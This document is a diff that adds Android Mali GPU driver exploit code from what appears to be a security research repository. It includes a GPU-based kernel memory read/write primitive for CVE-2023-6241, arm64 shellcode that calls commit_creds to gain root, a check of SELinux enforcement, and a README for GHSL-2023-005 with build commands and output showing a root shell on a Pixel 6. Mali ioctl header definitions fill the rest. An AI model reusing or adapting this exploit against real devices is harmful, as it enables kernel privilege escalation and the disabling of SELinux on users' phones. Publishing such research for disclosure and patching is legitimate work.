kbase_ioctl_apc_request { + __u32 dur_usec; +}; + +#define KBASE_IOCTL_APC_REQUEST \ + _IOW(KBASE_IOCTL_TYPE, 66, struct kbase_ioctl_apc_request) + +/** + * struct kbase_ioctl_buffer_liveness_update - Update the live ranges of buffers from previous frame + * + * @live_ranges_address: Array of live ranges + * @live_ranges_count: Number of elements in the live ranges buffer + * @buffer_va_address: Array of buffer base virtual addresses + * @buffer_sizes_address: Array of buffer sizes + * @buffer_count: Number of buffers + * @padding: Unused + */ +struct kbase_ioctl_buffer_liveness_update { + __u64 live_ranges_address; + __u64 live_ranges_count; + __u64 buffer_va_address; + __u64 buffer_sizes_address; + __u64 buffer_count; +}; + +#define KBASE_IOCTL_BUFFER_LIVENESS_UPDATE \ + _IOW(KBASE_IOCTL_TYPE, 67, struct kbase_ioctl_buffer_liveness_update) + +/*************** + * test ioctls * + ***************/ +#if MALI_UNIT_TEST +/* These ioctls are purely for test purposes and are not used in the production + * driver, they therefore may change without notice + */ + +#define KBASE_IOCTL_TEST_TYPE (KBASE_IOCTL_TYPE + 1) + + +/** + * struct kbase_ioctl_tlstream_stats - Read tlstream stats for test purposes + * @bytes_collected: number of bytes read by user + * @bytes_generated: number of bytes generated by tracepoints + */ +struct kbase_ioctl_tlstream_stats { + __u32 bytes_collected; + __u32 bytes_generated; +}; + +#define KBASE_IOCTL_TLSTREAM_STATS \ + _IOR(KBASE_IOCTL_TEST_TYPE, 2, struct kbase_ioctl_tlstream_stats) + +#endif /* MALI_UNIT_TEST */ + +/* Customer extension range */ +#define KBASE_IOCTL_EXTRA_TYPE (KBASE_IOCTL_TYPE + 2) + +/* If the integration needs extra ioctl add them there + * like this: + * + * struct my_ioctl_args { + * .... + * } + * + * #define KBASE_IOCTL_MY_IOCTL \ + * _IOWR(KBASE_IOCTL_EXTRA_TYPE, 0, struct my_ioctl_args) + */ + + +/********************************** + * Definitions for GPU properties * + **********************************/ +#define KBASE_GPUPROP_VALUE_SIZE_U8 (0x0) +#define KBASE_GPUPROP_VALUE_SIZE_U16 (0x1) +#define KBASE_GPUPROP_VALUE_SIZE_U32 (0x2) +#define KBASE_GPUPROP_VALUE_SIZE_U64 (0x3) + +#define KBASE_GPUPROP_PRODUCT_ID 1 +#define KBASE_GPUPROP_VERSION_STATUS 2 +#define KBASE_GPUPROP_MINOR_REVISION 3 +#define KBASE_GPUPROP_MAJOR_REVISION 4 +/* 5 previously used for GPU speed */ +#define KBASE_GPUPROP_GPU_FREQ_KHZ_MAX 6 +/* 7 previously used for minimum GPU speed */ +#define KBASE_GPUPROP_LOG2_PROGRAM_COUNTER_SIZE 8 +#define KBASE_GPUPROP_TEXTURE_FEATURES_0 9 +#define KBASE_GPUPROP_TEXTURE_FEATURES_1 10 +#define KBASE_GPUPROP_TEXTURE_FEATURES_2 11 +#define KBASE_GPUPROP_GPU_AVAILABLE_MEMORY_SIZE 12 + +#define KBASE_GPUPROP_L2_LOG2_LINE_SIZE 13 +#define KBASE_GPUPROP_L2_LOG2_CACHE_SIZE 14 +#define KBASE_GPUPROP_L2_NUM_L2_SLICES 15 + +#define KBASE_GPUPROP_TILER_BIN_SIZE_BYTES 16 +#define KBASE_GPUPROP_TILER_MAX_ACTIVE_LEVELS 17 + +#define KBASE_GPUPROP_MAX_THREADS 18 +#define KBASE_GPUPROP_MAX_WORKGROUP_SIZE 19 +#define KBASE_GPUPROP_MAX_BARRIER_SIZE 20 +#define KBASE_GPUPROP_MAX_REGISTERS 21 +#define KBASE_GPUPROP_MAX_TASK_QUEUE 22 +#define KBASE_GPUPROP_MAX_THREAD_GROUP_SPLIT 23 +#define KBASE_GPUPROP_IMPL_TECH 24 + +#define KBASE_GPUPROP_RAW_SHADER_PRESENT 25 +#define KBASE_GPUPROP_RAW_TILER_PRESENT 26 +#define KBASE_GPUPROP_RAW_L2_PRESENT 27 +#define KBASE_GPUPROP_RAW_STACK_PRESENT 28 +#define KBASE_GPUPROP_RAW_L2_FEATURES 29 +#define KBASE_GPUPROP_RAW_CORE_FEATURES 30 +#define KBASE_GPUPROP_RAW_MEM_FEATURES 31 +#define KBASE_GPUPROP_RAW_MMU_FEATURES 32 +#define KBASE_GPUPROP_RAW_AS_PRESENT 33 +#define KBASE_GPUPROP_RAW_JS_PRESENT 34 +#define KBASE_GPUPROP_RAW_JS_FEATURES_0 35 +#define KBASE_GPUPROP_RAW_JS_FEATURES_1 36 +#define KBASE_GPUPROP_RAW_JS_FEATURES_2 37 +#define KBASE_GPUPROP_RAW_JS_FEATURES_3 38 +#define KBASE_GPUPROP_RAW_JS_FEATURES_4 39 +#define KBASE_GPUPROP_RAW_JS_FEATURES_5 40 +#define KBASE_GPUPROP_RAW_JS_FEATURES_6 41 +#define KBASE_GPUPROP_RAW_JS_FEATURES_7 42 +#define KBASE_GPUPROP_RAW_JS_FEATURES_8 43 +#define KBASE_GPUPROP_RAW_JS_FEATURES_9 44 +#define KBASE_GPUPROP_RAW_JS_FEATURES_10 45 +#define KBASE_GPUPROP_RAW_JS_FEATURES_11 46 +#define KBASE_GPUPROP_RAW_JS_FEATURES_12 47 +#define KBASE_GPUPROP_RAW_JS_FEATURES_13 48 +#define KBASE_GPUPROP_RAW_JS_FEATURES_14 49 +#define KBASE_GPUPROP_RAW_JS_FEATURES_15 50 +#define KBASE_GPUPROP_RAW_TILER_FEATURES 51 +#define KBASE_GPUPROP_RAW_TEXTURE_FEATURES_0 52 +#define KBASE_GPUPROP_RAW_TEXTURE_FEATURES_1 53 +#define KBASE_GPUPROP_RAW_TEXTURE_FEATURES_2 54 +#define KBASE_GPUPROP_RAW_GPU_ID 55 +#define KBASE_GPUPROP_RAW_THREAD_MAX_THREADS 56 +#define KBASE_GPUPROP_RAW_THREAD_MAX_WORKGROUP_SIZE 57 +#define KBASE_GPUPROP_RAW_THREAD_MAX_BARRIER_SIZE 58 +#define KBASE_GPUPROP_RAW_THREAD_FEATURES 59 +#define KBASE_GPUPROP_RAW_COHERENCY_MODE 60 + +#define KBASE_GPUPROP_COHERENCY_NUM_GROUPS 61 +#define KBASE_GPUPROP_COHERENCY_NUM_CORE_GROUPS 62 +#define KBASE_GPUPROP_COHERENCY_COHERENCY 63 +#define KBASE_GPUPROP_COHERENCY_GROUP_0 64 +#define KBASE_GPUPROP_COHERENCY_GROUP_1 65 +#define KBASE_GPUPROP_COHERENCY_GROUP_2 66 +#define KBASE_GPUPROP_COHERENCY_GROUP_3 67 +#define KBASE_GPUPROP_COHERENCY_GROUP_4 68 +#define KBASE_GPUPROP_COHERENCY_GROUP_5 69 +#define KBASE_GPUPROP_COHERENCY_GROUP_6 70 +#define KBASE_GPUPROP_COHERENCY_GROUP_7 71 +#define KBASE_GPUPROP_COHERENCY_GROUP_8 72 +#define KBASE_GPUPROP_COHERENCY_GROUP_9 73 +#define KBASE_GPUPROP_COHERENCY_GROUP_10 74 +#define KBASE_GPUPROP_COHERENCY_GROUP_11 75 +#define KBASE_GPUPROP_COHERENCY_GROUP_12 76 +#define KBASE_GPUPROP_COHERENCY_GROUP_13 77 +#define KBASE_GPUPROP_COHERENCY_GROUP_14 78 +#define KBASE_GPUPROP_COHERENCY_GROUP_15 79 + +#define KBASE_GPUPROP_TEXTURE_FEATURES_3 80 +#define KBASE_GPUPROP_RAW_TEXTURE_FEATURES_3 81 + +#define KBASE_GPUPROP_NUM_EXEC_ENGINES 82 + +#define KBASE_GPUPROP_RAW_THREAD_TLS_ALLOC 83 +#define KBASE_GPUPROP_TLS_ALLOC 84 +#define KBASE_GPUPROP_RAW_GPU_FEATURES 85 +#ifdef __cpluscplus +} +#endif + +#endif /* _UAPI_KBASE_IOCTL_H_ */ diff --git a/SecurityExploits/Android/Mali/CVE_2023_6241/mem_read_write.c b/SecurityExploits/Android/Mali/CVE_2023_6241/mem_read_write.c new file mode 100644 index 0000000..1774f0e --- /dev/null +++ b/SecurityExploits/Android/Mali/CVE_2023_6241/mem_read_write.c @@ -0,0 +1,265 @@ +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include "stdbool.h" + +#include "mem_read_write.h" +#include "mempool_utils.h" +#include "firmware_offsets.h" + +#define ADRP_INIT_INDEX 0 + +#define ADD_INIT_INDEX 1 + +#define ADRP_COMMIT_INDEX 2 + +#define ADD_COMMIT_INDEX 3 + +void* map_gpu(int mali_fd, unsigned int va_pages, unsigned int commit_pages, bool read_only, int group) { + union kbase_ioctl_mem_alloc alloc = {0}; + alloc.in.flags = BASE_MEM_PROT_CPU_RD | BASE_MEM_PROT_GPU_RD | BASE_MEM_PROT_CPU_WR | (group << 22); + int prot = PROT_READ; + if (!read_only) { + alloc.in.flags |= BASE_MEM_PROT_GPU_WR; + prot |= PROT_WRITE; + } + alloc.in.va_pages = va_pages; + alloc.in.commit_pages = commit_pages; + mem_alloc(mali_fd, &alloc); + void* region = mmap(NULL, 0x1000 * va_pages, prot, MAP_SHARED, mali_fd, alloc.out.gpu_va); + if (region == MAP_FAILED) { + err(1, "mmap failed"); + } + return region; +} + +static inline uint32_t lo32(uint64_t x) { + return x & 0xffffffff; +} + +static inline uint32_t hi32(uint64_t x) { + return x >> 32; +} + +static uint32_t write_adrp(int rd, uint64_t pc, uint64_t label) { + uint64_t pc_page = pc >> 12; + uint64_t label_page = label >> 12; + int64_t offset = (label_page - pc_page) << 12; + int64_t immhi_mask = 0xffffe0; + int64_t immhi = offset >> 14; + int32_t immlo = (offset >> 12) & 0x3; + uint32_t adpr = rd & 0x1f; + adpr |= (1 << 28); + adpr |= (1 << 31); //op + adpr |= immlo << 29; + adpr |= (immhi_mask & (immhi << 5)); + return adpr; +} + +void fixup_root_shell(uint64_t init_cred, uint64_t commit_cred, uint64_t read_enforce, uint32_t add_init, uint32_t add_commit, uint32_t* root_code) { + + uint32_t init_adpr = write_adrp(0, read_enforce, init_cred); + //Sets x0 to init_cred + root_code[ADRP_INIT_INDEX] = init_adpr; + root_code[ADD_INIT_INDEX] = add_init; + //Sets x8 to commit_creds + root_code[ADRP_COMMIT_INDEX] = write_adrp(8, read_enforce, commit_cred); + root_code[ADD_COMMIT_INDEX] = add_commit; + root_code[4] = 0xa9bf7bfd; // stp x29, x30, [sp, #-0x10] + root_code[5] = 0xd63f0100; // blr x8 + root_code[6] = 0xa8c17bfd; // ldp x29, x30, [sp], #0x10 + root_code[7] = 0xd65f03c0; // ret +} + +static uint64_t set_addr_lv3(uint64_t addr) { + uint64_t pfn = addr >> PAGE_SHIFT; + pfn &= ~ 0x1FFUL; + pfn |= 0x100UL; + return pfn << PAGE_SHIFT; +} + +static inline uint64_t compute_pt_index(uint64_t addr, int level) { + uint64_t vpfn = addr >> PAGE_SHIFT; + vpfn >>= (3 - level) * 9; + return vpfn & 0x1FF; +} + +struct rw_mem_kernel create_rw_mem(cl_context context, cl_device_id* device_id, bool is64) { + int ret = 0; + + const char* source_str64 = + "__kernel void rw_mem(__global unsigned long *va, __global unsigned long *in_out, __global unsigned long *flag) {" + "size_t idx = get_global_id(0);" + "if (flag[idx]) {" + " __global unsigned long *addr = (__global unsigned long*)(va[idx]);" + " addr[0] = in_out[idx];" + "} else {" + " __global unsigned long *addr = (__global unsigned long *)(va[idx]);" + " in_out[idx] = addr[0];" + "}" +"};"; + + const char* source_str32 = + "__kernel void rw_mem(__global unsigned long *va, __global unsigned long *in_out, __global unsigned long *flag) {" + "size_t idx = get_global_id(0);" + "if (flag[idx]) {" + " __global unsigned int *addr = (__global unsigned int*)(va[idx]);" + " addr[0] = (unsigned int)(in_out[idx]);" + "} else {" + " __global unsigned int *addr = (__global unsigned int *)(va[idx]);" + " in_out[idx] = addr[0];" + "}" +"};"; + + const char* source_str = is64 ? source_str64 : source_str32; + + size_t source_size = strlen(source_str); + + cl_mem va = clCreateBuffer(context, CL_MEM_READ_WRITE, + sizeof(uint64_t), NULL, &ret); + if (ret != CL_SUCCESS) { + err(1, "Failed to create va buffer\n"); + } + cl_mem in_out = clCreateBuffer(context, CL_MEM_READ_WRITE, + sizeof(uint64_t), NULL, &ret); + if (ret != CL_SUCCESS) { + err(1, "Failed to create in_out buffer\n"); + } + cl_mem flag = clCreateBuffer(context, CL_MEM_READ_WRITE, + sizeof(uint64_t), NULL, &ret); + if (ret != CL_SUCCESS) { + err(1, "Failed to create flag buffer\n"); + } + + cl_program program = clCreateProgramWithSource(context, 1, (const char**)(&source_str), (const size_t*)(&source_size), &ret); + ret = clBuildProgram(program, 1, device_id, NULL, NULL, NULL); + if (ret != CL_SUCCESS) { + err(1, "Failed to create program\n"); + } + + cl_kernel kernel = clCreateKernel(program, "rw_mem", &ret); + if (ret != CL_SUCCESS) { + err(1, "Failed to create kernel %d\n", ret); + } + printf("kernel success\n"); + ret = clSetKernelArg(kernel, 0, sizeof(cl_mem), (void *)&va); + ret = clSetKernelArg(kernel, 1, sizeof(cl_mem), (void *)&in_out); + ret = clSetKernelArg(kernel, 2, sizeof(cl_mem), (void *)&flag); + if (ret != CL_SUCCESS) { + err(1, "Failed to set kernel arg\n"); + } + struct rw_mem_kernel out = {0}; + out.va = va; + out.in_out = in_out; + out.flag = flag; + out.kernel = kernel; + out.program = program; + return out; +} + +void write_to(int mali_fd, uint64_t* gpu_addr, uint64_t* value, cl_command_queue command_queue, struct rw_mem_kernel* kernel) { + uint64_t write = 1; + int ret = 0; + ret = clEnqueueWriteBuffer(command_queue, kernel->va, CL_TRUE, 0, sizeof(uint64_t), gpu_addr, 0, NULL, NULL); + ret = clEnqueueWriteBuffer(command_queue, kernel->in_out, CL_TRUE, 0, sizeof(uint64_t), value, 0, NULL, NULL); + ret = clEnqueueWriteBuffer(command_queue, kernel->flag, CL_TRUE, 0, sizeof(uint64_t), &write, 0, NULL, NULL); + + if (ret != CL_SUCCESS) { + err(1, "Failed to write to buffer\n"); + } + + size_t global_work_size = 1; + size_t local_work_size = 1; + ret = clEnqueueNDRangeKernel(command_queue, kernel->kernel, 1, NULL, &global_work_size, &local_work_size, 0, NULL, NULL); + if (ret != CL_SUCCESS) { + err(1, "Failed to enqueue kernel\n"); + } + if (clFlush(command_queue) != CL_SUCCESS) { + err(1, "Falied to flush queue in write_to\n"); + } + usleep(10000); +} + + +void write_func(int mali_fd, uint64_t func, uint64_t* reserved, uint64_t size, uint32_t* shellcode, uint64_t code_size, uint64_t reserved_size, cl_command_queue command_queue, struct rw_mem_kernel* kernel32) { + uint64_t func_offset = (func + KERNEL_BASE) % 0x1000; + uint64_t curr_overwrite_addr = 0; + for (int i = 0; i < size; i++) { + uint64_t base = reserved[i]; + uint64_t end = reserved[i] + reserved_size * 0x1000; + uint64_t start_idx = compute_pt_index(base, 3); + uint64_t end_idx = compute_pt_index(end, 3); + for (uint64_t addr = base; addr < end; addr += 0x1000) { + uint64_t overwrite_addr = set_addr_lv3(addr); + if (curr_overwrite_addr != overwrite_addr) { + LOG("overwrite addr : %lx %lx\n", overwrite_addr + func_offset, func_offset); + curr_overwrite_addr = overwrite_addr; + for (int code = code_size - 1; code >= 0; code--) { + uint64_t this_addr = overwrite_addr + func_offset + code * 4; + uint64_t this_code = shellcode[code]; + write_to(mali_fd, &this_addr, &this_code, command_queue, kernel32); + } + usleep(300000); + } + } + } +} + +uint64_t read_from(int mali_fd, uint64_t* gpu_addr, cl_command_queue command_queue, struct rw_mem_kernel* kernel) { + uint64_t read = 0; + int ret = 0; + ret = clEnqueueWriteBuffer(command_queue, kernel->va, CL_TRUE, 0, sizeof(uint64_t), gpu_addr, 0, NULL, NULL); + ret = clEnqueueWriteBuffer(command_queue, kernel->flag, CL_TRUE, 0, sizeof(uint64_t), &read, 0, NULL, NULL); + + if (ret != CL_SUCCESS) { + err(1, "Failed to write to buffer\n"); + } + + size_t global_work_size = 1; + size_t local_work_size = 1; + ret = clEnqueueNDRangeKernel(command_queue, kernel->kernel, 1, NULL, &global_work_size, &local_work_size, 0, NULL, NULL); + if (ret != CL_SUCCESS) { + err(1, "Failed to enqueue kernel\n"); + } + uint64_t out = 0; + if (clEnqueueReadBuffer(command_queue, kernel->in_out, CL_TRUE, 0, sizeof(uint64_t), &out, 0, NULL, NULL) != CL_SUCCESS) { + err(1, "Failed to read result\n"); + } + if (clFlush(command_queue) != CL_SUCCESS) { + err(1, "Falied to flush queue in write_to\n"); + } + usleep(10000); + return out; +} + +void releaseKernel(struct rw_mem_kernel* kernel) { + clReleaseKernel(kernel->kernel); + clReleaseProgram(kernel->program); + clReleaseMemObject(kernel->va); + clReleaseMemObject(kernel->in_out); + clReleaseMemObject(kernel->flag); + memset(kernel, 0, sizeof(struct rw_mem_kernel)); +} + +void cleanup(int mali_fd, uint64_t pgd, cl_command_queue command_queue, struct rw_mem_kernel* kernel) { + uint64_t addr = pgd + OVERWRITE_INDEX * sizeof(uint64_t); + uint64_t invalid = 2; + write_to(mali_fd, &addr, &invalid, command_queue, kernel); +} + +int run_enforce() { + char result = '2'; + sleep(3); + int enforce_fd = open("/sys/fs/selinux/enforce", O_RDONLY); + read(enforce_fd, &result, 1); + close(enforce_fd); + LOG("result %d\n", result); + return result; +} diff --git a/SecurityExploits/Android/Mali/CVE_2023_6241/mem_read_write.h b/SecurityExploits/Android/Mali/CVE_2023_6241/mem_read_write.h new file mode 100644 index 0000000..1906051 --- /dev/null +++ b/SecurityExploits/Android/Mali/CVE_2023_6241/mem_read_write.h @@ -0,0 +1,41 @@ +#ifndef MEM_READ_WRITE_H +#define MEM_READ_WRITE_H + +#include "CL/cl.h" +#include "mali_kbase_ioctl.h" +#include "mali_base_csf_kernel.h" +#include "mali_base_kernel.h" + +#define KERNEL_BASE 0x80000000 + +#define PAGE_SHIFT 12 + +#define OVERWRITE_INDEX 256 + +struct rw_mem_kernel { + cl_mem va; + cl_mem in_out; + cl_mem flag; + cl_kernel kernel; + cl_program program; +}; + +void* map_gpu(int mali_fd, unsigned int va_pages, unsigned int commit_pages, bool read_only, int group); + +void fixup_root_shell(uint64_t init_cred, uint64_t commit_cred, uint64_t read_enforce, uint32_t add_init, uint32_t add_commit, uint32_t* root_code); + +void write_to(int mali_fd, uint64_t* gpu_addr, uint64_t* value, cl_command_queue command_queue, struct rw_mem_kernel* kernel); + +uint64_t read_from(int mali_fd, uint64_t* gpu_addr, cl_command_queue command_queue, struct rw_mem_kernel* kernel); + +void write_func(int mali_fd, uint64_t func, uint64_t* reserved, uint64_t size, uint32_t* shellcode, uint64_t code_size, uint64_t reserved_size, cl_command_queue command_queue, struct rw_mem_kernel* kernel32); + +void cleanup(int mali_fd, uint64_t pgd, cl_command_queue command_queue, struct rw_mem_kernel* kernel); + +struct rw_mem_kernel create_rw_mem(cl_context context, cl_device_id* device_id, bool is64); + +void releaseKernel(struct rw_mem_kernel* kernel); + +int run_enforce(); + +#endif diff --git a/SecurityExploits/Android/Mali/CVE_2023_6241/mempool_utils.c b/SecurityExploits/Android/Mali/CVE_2023_6241/mempool_utils.c new file mode 100644 index 0000000..c96b25c --- /dev/null +++ b/SecurityExploits/Android/Mali/CVE_2023_6241/mempool_utils.c @@ -0,0 +1,60 @@ +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include "stdbool.h" +#include + +#include "mempool_utils.h" + +#define POOL_SIZE 16384 + +void mem_alloc(int fd, union kbase_ioctl_mem_alloc* alloc) { + if (ioctl(fd, KBASE_IOCTL_MEM_ALLOC, alloc) < 0) { + err(1, "mem_alloc failed\n"); + } +} + +void reserve_pages(int mali_fd, int pages, int nents, uint64_t* reserved_va) { + for (int i = 0; i < nents; i++) { + union kbase_ioctl_mem_alloc alloc = {0}; + alloc.in.flags = BASE_MEM_PROT_CPU_RD | BASE_MEM_PROT_GPU_RD | BASE_MEM_PROT_CPU_WR | BASE_MEM_PROT_GPU_WR; + int prot = PROT_READ | PROT_WRITE; + alloc.in.va_pages = pages; + alloc.in.commit_pages = pages; + mem_alloc(mali_fd, &alloc); + reserved_va[i] = alloc.out.gpu_va; + } +} + +void map_reserved(int mali_fd, int pages, int nents, uint64_t* reserved_va) { + for (int i = 0; i < nents; i++) { + void* reserved = mmap(NULL, 0x1000 * pages, PROT_READ | PROT_WRITE, MAP_SHARED, mali_fd, reserved_va[i]); + if (reserved == MAP_FAILED) { + err(1, "mmap reserved failed %d\n", i); + } + reserved_va[i] = (uint64_t)reserved; + } +} + +uint64_t drain_mem_pool(int mali_fd) { + union kbase_ioctl_mem_alloc alloc = {0}; + alloc.in.flags = BASE_MEM_PROT_CPU_RD | BASE_MEM_PROT_GPU_RD | BASE_MEM_PROT_CPU_WR | BASE_MEM_PROT_GPU_WR; + int prot = PROT_READ | PROT_WRITE; + alloc.in.va_pages = POOL_SIZE; + alloc.in.commit_pages = POOL_SIZE; + mem_alloc(mali_fd, &alloc); + return alloc.out.gpu_va; +} + +void release_mem_pool(int mali_fd, uint64_t drain) { + struct kbase_ioctl_mem_free mem_free = {.gpu_addr = drain}; + if (ioctl(mali_fd, KBASE_IOCTL_MEM_FREE, &mem_free) < 0) { + err(1, "free_mem failed\n"); + } +} diff --git a/SecurityExploits/Android/Mali/CVE_2023_6241/mempool_utils.h b/SecurityExploits/Android/Mali/CVE_2023_6241/mempool_utils.h new file mode 100644 index 0000000..9aa4caa --- /dev/null +++ b/SecurityExploits/Android/Mali/CVE_2023_6241/mempool_utils.h @@ -0,0 +1,20 @@ +#ifndef MEMPOOL_UTILS_H +#define MEMPOOL_UTILS_H + +#include +#include "mali_kbase_ioctl.h" +#include "mali_base_csf_kernel.h" +#include "mali_base_kernel.h" +#include "log_utils.h" + +void mem_alloc(int fd, union kbase_ioctl_mem_alloc* alloc); + +void reserve_pages(int mali_fd, int pages, int nents, uint64_t* reserved_va); + +void map_reserved(int mali_fd, int pages, int nents, uint64_t* reserved_va); + +uint64_t drain_mem_pool(int mali_fd); + +void release_mem_pool(int mali_fd, uint64_t drain); + +#endif diff --git a/SecurityExploits/Android/Mali/GHSL-2023-005/README.md b/SecurityExploits/Android/Mali/GHSL-2023-005/README.md new file mode 100644 index 0000000..44409ad --- /dev/null +++ b/SecurityExploits/Android/Mali/GHSL-2023-005/README.md @@ -0,0 +1,39 @@ +## Exploit for GHSL-2023-005 + +The write up can be found [here](https://github.blog/2023-04-06-pwning-pixel-6-with-a-leftover-patch). A security patch from the upstream Arm Mali driver somehow got missed out in the update for the Pixel phones and I reported it to Google in January 2023. The bug can be used to gain arbitrary kernel code execution from the untrusted app domain, which is then used to disable SELinux and gain root. + +The exploit is tested on the Google Pixel 6 for devices running the January 2023 patch. For reference, I used the following command to compile it with clang in ndk-21: + +``` +android-ndk-r21d-linux-x86_64/android-ndk-r21d/toolchains/llvm/prebuilt/linux-x86_64/bin/aarch64-linux-android30-clang -DSHELL mali_jit.c -o mali_jit +``` + +The exploit should be run a couple of minutes after boot and should be fairly reliable. If failed, it can be rerun and should succeed within a few times. +If successful, it should disable SELinux and gain root. + +``` +oriole:/ $ /data/local/tmp/mali_jit +fingerprint: google/oriole/oriole:13/TQ1A.230105.002/9325679:user/release-keys +region freed +found region 16115 at 7000200000 +overwrite addr : 7ae9700710 710 +overwrite addr : 7ae9500710 710 +overwrite addr : 7828500710 710 +overwrite addr : 7828300710 710 +overwrite addr : 7828500710 710 +overwrite addr : 7828300710 710 +overwrite addr : 7828100710 710 +overwrite addr : 7828300710 710 +overwrite addr : 7828100710 710 +overwrite addr : 7ae9700fd4 fd4 +overwrite addr : 7ae9500fd4 fd4 +overwrite addr : 7828500fd4 fd4 +overwrite addr : 7828300fd4 fd4 +overwrite addr : 7828500fd4 fd4 +overwrite addr : 7828300fd4 fd4 +overwrite addr : 7828100fd4 fd4 +overwrite addr : 7828300fd4 fd4 +overwrite addr : 7828100fd4 fd4 +result 50 +oriole:/ # +``` diff --git a/SecurityExploits/Android/Mali/GHSL-2023-005/mali.h b/SecurityExploits/Android/Mali/GHSL-2023-005/mali.h new file mode 100644 index 0000000..3b61e20 --- /dev/null +++ b/SecurityExploits/Android/Mali/GHSL-2023-005/mali.h @@ -0,0 +1,1060 @@ +/* SPDX-License-Identifier: GPL-2.0 WITH Linux-syscall-note */ +/* + * + * (C) COPYRIGHT 2020-2021 ARM Limited. All rights reserved. + * + * This program is free software and is provided to you under the terms of the + * GNU General Public License version 2 as published by the Free Software + * Foundation, and any use by you of this program is subject to the terms + * of such GNU license. + * + * This program is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + * GNU General Public License for more details. + * + * You should have received a copy of the GNU General Public License + * along with this program; if not, you can access it online at + * http://www.gnu.org/licenses/gpl-2.0.html. + * + */ + +#ifndef _UAPI_KBASE_JM_IOCTL_H_ +#define _UAPI_KBASE_JM_IOCTL_H_ + +#include +#include + +/* + * 11.1: + * - Add BASE_MEM_TILER_ALIGN_TOP under base_mem_alloc_flags + * 11.2: + * - KBASE_MEM_QUERY_FLAGS can return KBASE_REG_PF_GROW and KBASE_REG_PROTECTED, + * which some user-side clients prior to 11.2 might fault if they received + * them + * 11.3: + * - New ioctls KBASE_IOCTL_STICKY_RESOURCE_MAP and + * KBASE_IOCTL_STICKY_RESOURCE_UNMAP + * 11.4: + * - New ioctl KBASE_IOCTL_MEM_FIND_GPU_START_AND_OFFSET + * 11.5: + * - New ioctl: KBASE_IOCTL_MEM_JIT_INIT (old ioctl renamed to _OLD) + * 11.6: + * - Added flags field to base_jit_alloc_info structure, which can be used to + * specify pseudo chunked tiler alignment for JIT allocations. + * 11.7: + * - Removed UMP support + * 11.8: + * - Added BASE_MEM_UNCACHED_GPU under base_mem_alloc_flags + * 11.9: + * - Added BASE_MEM_PERMANENT_KERNEL_MAPPING and BASE_MEM_FLAGS_KERNEL_ONLY + * under base_mem_alloc_flags + * 11.10: + * - Enabled the use of nr_extres field of base_jd_atom_v2 structure for + * JIT_ALLOC and JIT_FREE type softjobs to enable multiple JIT allocations + * with one softjob. + * 11.11: + * - Added BASE_MEM_GPU_VA_SAME_4GB_PAGE under base_mem_alloc_flags + * 11.12: + * - Removed ioctl: KBASE_IOCTL_GET_PROFILING_CONTROLS + * 11.13: + * - New ioctl: KBASE_IOCTL_MEM_EXEC_INIT + * 11.14: + * - Add BASE_MEM_GROUP_ID_MASK, base_mem_group_id_get, base_mem_group_id_set + * under base_mem_alloc_flags + * 11.15: + * - Added BASEP_CONTEXT_MMU_GROUP_ID_MASK under base_context_create_flags. + * - Require KBASE_IOCTL_SET_FLAGS before BASE_MEM_MAP_TRACKING_HANDLE can be + * passed to mmap(). + * 11.16: + * - Extended ioctl KBASE_IOCTL_MEM_SYNC to accept imported dma-buf. + * - Modified (backwards compatible) ioctl KBASE_IOCTL_MEM_IMPORT behavior for + * dma-buf. Now, buffers are mapped on GPU when first imported, no longer + * requiring external resource or sticky resource tracking. UNLESS, + * CONFIG_MALI_DMA_BUF_MAP_ON_DEMAND is enabled. + * 11.17: + * - Added BASE_JD_REQ_JOB_SLOT. + * - Reused padding field in base_jd_atom_v2 to pass job slot number. + * - New ioctl: KBASE_IOCTL_GET_CPU_GPU_TIMEINFO + * 11.18: + * - Added BASE_MEM_IMPORT_SYNC_ON_MAP_UNMAP under base_mem_alloc_flags + * 11.19: + * - Extended base_jd_atom_v2 to allow a renderpass ID to be specified. + * 11.20: + * - Added new phys_pages member to kbase_ioctl_mem_jit_init for + * KBASE_IOCTL_MEM_JIT_INIT, previous variants of this renamed to use _10_2 + * (replacing '_OLD') and _11_5 suffixes + * - Replaced compat_core_req (deprecated in 10.3) with jit_id[2] in + * base_jd_atom_v2. It must currently be initialized to zero. + * - Added heap_info_gpu_addr to base_jit_alloc_info, and + * BASE_JIT_ALLOC_HEAP_INFO_IS_SIZE allowable in base_jit_alloc_info's + * flags member. Previous variants of this structure are kept and given _10_2 + * and _11_5 suffixes. + * - The above changes are checked for safe values in usual builds + * 11.21: + * - v2.0 of mali_trace debugfs file, which now versions the file separately + * 11.22: + * - Added base_jd_atom (v3), which is seq_nr + base_jd_atom_v2. + * KBASE_IOCTL_JOB_SUBMIT supports both in parallel. + * 11.23: + * - Modified KBASE_IOCTL_MEM_COMMIT behavior to reject requests to modify + * the physical memory backing of JIT allocations. This was not supposed + * to be a valid use case, but it was allowed by the previous implementation. + * 11.24: + * - Added a sysfs file 'serialize_jobs' inside a new sub-directory + * 'scheduling'. + * 11.25: + * - Enabled JIT pressure limit in base/kbase by default + * 11.26 + * - Added kinstr_jm API + * 11.27 + * - Backwards compatible extension to HWC ioctl. + * 11.28: + * - Added kernel side cache ops needed hint + * 11.29: + * - Reserve ioctl 52 + * 11.30: + * - Add a new priority level BASE_JD_PRIO_REALTIME + * - Add ioctl 54: This controls the priority setting. + * 11.31: + * - Added BASE_JD_REQ_LIMITED_CORE_MASK. + * - Added ioctl 55: set_limited_core_count. + */ +#define BASE_UK_VERSION_MAJOR 11 +#define BASE_UK_VERSION_MINOR 31 + +/** + * struct kbase_ioctl_version_check - Check version compatibility between + * kernel and userspace + * + * @major: Major version number + * @minor: Minor version number + */ +struct kbase_ioctl_version_check { + __u16 major; + __u16 minor; +}; + +#define KBASE_IOCTL_VERSION_CHECK \ + _IOWR(KBASE_IOCTL_TYPE, 0, struct kbase_ioctl_version_check) + + +/** + * struct kbase_ioctl_job_submit - Submit jobs/atoms to the kernel + * + * @addr: Memory address of an array of struct base_jd_atom_v2 or v3 + * @nr_atoms: Number of entries in the array + * @stride: sizeof(struct base_jd_atom_v2) or sizeof(struct base_jd_atom) + */ +struct kbase_ioctl_job_submit { + __u64 addr; + __u32 nr_atoms; + __u32 stride; +}; + +#define KBASE_IOCTL_JOB_SUBMIT \ + _IOW(KBASE_IOCTL_TYPE, 2, struct kbase_ioctl_job_submit) + +#define KBASE_IOCTL_POST_TERM \ + 